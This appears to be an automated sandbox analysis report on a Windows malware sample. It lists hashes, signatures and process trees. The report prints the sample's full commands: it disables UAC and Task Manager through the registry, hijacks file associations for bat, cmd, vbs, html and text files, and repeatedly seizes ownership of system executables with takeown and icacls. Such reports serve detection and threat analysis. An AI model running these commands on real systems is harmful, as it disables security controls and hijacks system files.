Analysis
- max time kernel: 102s
- max time network: 102s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 05-11-2024 12:29
Static task: static1
Behavioral task: behavioral1
- Sample: 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe
- Resource: win10v2004-20241007-en
General
- Target: 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe
- Size: 574KB
- MD5: e39790d2164de5008c336fed365a3510
- SHA1: eeeb523b1c7e956312e07cdf1456e021978a6b9e
- SHA256: 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03
- SHA512: 0a8ee2ec841ee3898899c8f41bc427aa4b6e674931ca4ee7a544be4c180fb1974df3acdfdb9e48336619086e2e7d2d778603d37b7b06fe7cec8501ba76906c27
- SSDEEP: 12288:/pW2IoioS6p8IReqYIiYkYAY6YLYr5bVY4:/qon8
Malware Config
Signatures
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Disables Task Manager via registry modification
Possible privilege escalation attempt 64 IoCs
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe: Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation
Modifies file permissions 1 TTPs 64 IoCs
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
- 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe BATCF %1"
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
Drops file in System32 directory 1 IoCs
Processes:
- 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe: File opened for modification C:\Windows\System32\SpatialAudioLicenseSrv.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Modifies registry class 10 IoCs
Processes:
458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe, Set value (str):
- \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe BATCF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe CMDSF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe JPGIF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe VBSSF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe HTMWF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe RTFDF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe NTPAD %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe NTPAD %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe NTPAD %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe NTPAD %1"
Modifies registry key 1 TTPs 2 IoCs
Suspicious behavior: EnumeratesProcesses 21 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- PID 1308: 458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe
Suspicious use of AdjustPrivilegeToken 23 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe"C:\Users\Admin\AppData\Local\Temp\458593810dc256bbc2aa7e756deab2b201acc3966c8144a9098e5c02ab0eee03N.exe"1⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:1916 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:4596 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\bfsvc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1724
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\HelpPane.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1444
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\hh.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1196 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3032 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\splwow64.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4684 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2296 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\winhlp32.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4004
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\write.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5112 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4464 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4232 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\msra.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2676
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1824
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4852 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1864 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2028
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\logagent.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2696 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1628 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1488
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3160 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2196 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:776 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2860
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3416 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4600 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1344 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4408 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\runas.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4472 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1032 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3940 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3024 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3692 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5648 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5728
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5756 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5780
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5840
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5896
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5980
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6008
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:6088
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6104 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4668 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1712
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5176
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4704 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5124
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5160
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5300 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5360 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5376 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5444
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5504 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5540 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5604 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:540
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4424
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5704 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1804 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2176
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4468 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5676
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:8
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5328
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4520
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3688
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:2636
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1756
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5752
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5528 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:1140
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1360
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4152 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5064 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4944
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1884
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5936
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2928 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4816
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5616 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:4508 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5924
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5892
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1264 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5720 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3196 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:2708 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5916
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:6052 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5764
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5784
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:556
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3564
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4380
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5964 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6036 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4444
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6092
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5184
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4704
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5420
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5380
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5600
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5376
-
